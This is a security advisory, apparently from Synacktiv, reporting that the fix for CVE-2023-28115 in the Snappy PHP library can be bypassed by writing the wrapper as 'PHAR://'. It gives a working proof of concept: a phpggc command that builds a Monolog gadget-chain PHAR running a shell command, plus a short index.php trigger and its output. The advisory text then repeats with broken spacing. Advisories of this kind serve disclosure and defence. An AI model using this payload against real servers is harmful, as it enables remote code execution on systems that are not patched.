Issue
On March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. To fix this issue, the version 1.4.2 was released with an additional check in the affected function to prevent the usage of the phar://
wrapper. However, because PHP wrappers are case-insensitive and the patch only checks the presence of the phar://
string, it can be bypassed to achieve remote code execution again using a different case.
As for the initial vulnerability, PHP 7 or below is required for a successful exploitation using the deserialization of PHP archives metadata via the phar://
wrapper.
Technical details
Description
The following patch was committed on the 1.4.2 release to fix CVE-2023-28115.
If the user is able to control the second parameter of the generateFromHtml()
function of Snappy, it will then be passed as the $filename
parameter in the prepareOutput()
function. In the original vulnerability, a file name with a phar://
wrapper could be sent to the fileExists()
function, equivalent to the file_exists()
PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files.
To fix this issue, the string is now passed to the strpos()
function and if it starts with phar://
, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using PHAR://
instead of phar://
.
Proof of Concept
To illustrate the vulnerability, the /tmp/exploit
file will be written to the filesystem using a voluntarily added library to trigger the deserialization. The PHP archive is generated using phpggc with the -f
option to force a fast destruct on the object. Otherwise, the PHP flow will stop on the first exception and the object destruction will not be called.
$ phpggc -f Monolog/RCE1 exec 'touch /tmp/exploit' -p phar -o exploit.phar
The following index.php
file will be used to trigger the vulnerability via the payload PHAR://exploit.phar
.
<?php
// index.php
// include autoloader
require __DIR__ . '/vendor/autoload.php';
// reference the snappy namespace
use Knp\Snappy\Pdf;
$snappy = new Pdf('/usr/local/bin/wkhtmltopdf');
$snappy->generateFromHtml('<h1>POC</h1>', 'PHAR://exploit.phar');
Finally once executed, the /tmp/exploit
file is successfully created on the filesystem.
$ php index.php
Fatal error: Uncaught InvalidArgumentException: The output file 'PHAR://exploit.phar' already exists and it is a directory. in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php:634
Stack trace:
#0 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(178): Knp\Snappy\AbstractGenerator->prepareOutput('PHAR://exploit.phar', false)
#1 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/Pdf.php(36): Knp\Snappy\AbstractGenerator->generate(Array, 'PHAR://exploit.phar', Array, false)
#2 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(232): Knp\Snappy\Pdf->generate(Array, 'PHAR://exploit.phar', Array, false)
#3 /var/www/index.php(12): Knp\Snappy\AbstractGenerator->generateFromHtml('<h1>POC</h1>', 'PHAR://exploit.phar')
#4 {main}
thrown in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php on line 634
$ ls -l /tmp/exploit
-rw-r--r-- 1 user_exploit user_exploit 0 Jun 14 10:05 exploit
This proof of concept is based on the original one published with CVE-2023-28115.
Impact
A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8.
Patches
Synacktiv recommends to use a whitelist instead of a blacklist. In this situation, only the wrappers http://
, https://
or file://
be available on the function generateFromHtml()
.
Workarounds
Control user data submitted to the function AbstractGenerator->generate(...)
References
GHSA-gq6w-q6wh-jggc
Credits
Rémi Matasse of Synacktiv (https://synacktiv.com/).
References
Issue
On March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. To fix this issue, the version 1.4.2 was released with an additional check in the affected function to prevent the usage of the
phar://
wrapper. However, because PHP wrappers are case-insensitive and the patch only checks the presence of thephar://
string, it can be bypassed to achieve remote code execution again using a different case.As for the initial vulnerability, PHP 7 or below is required for a successful exploitation using the deserialization of PHP archives metadata via the
phar://
wrapper.Technical details
Description
The following patch was committed on the 1.4.2 release to fix CVE-2023-28115.
If the user is able to control the second parameter of the
generateFromHtml()
function of Snappy, it will then be passed as the$filename
parameter in theprepareOutput()
function. In the original vulnerability, a file name with aphar://
wrapper could be sent to thefileExists()
function, equivalent to thefile_exists()
PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files.To fix this issue, the string is now passed to the
strpos()
function and if it starts withphar://
, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed usingPHAR://
instead ofphar://
.Proof of Concept
To illustrate the vulnerability, the
/tmp/exploit
file will be written to the filesystem using a voluntarily added library to trigger the deserialization. The PHP archive is generated using phpggc with the-f
option to force a fast destruct on the object. Otherwise, the PHP flow will stop on the first exception and the object destruction will not be called.The following
index.php
file will be used to trigger the vulnerability via the payloadPHAR://exploit.phar
.Finally once executed, the
/tmp/exploit
file is successfully created on the filesystem.This proof of concept is based on the original one published with CVE-2023-28115.
Impact
A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8.
Patches
Synacktiv recommends to use a whitelist instead of a blacklist. In this situation, only the wrappers
http://
,https://
orfile://
be available on the functiongenerateFromHtml()
.Workarounds
Control user data submitted to the function
AbstractGenerator->generate(...)
References
GHSA-gq6w-q6wh-jggc
Credits
Rémi Matasse of Synacktiv (https://synacktiv.com/).
References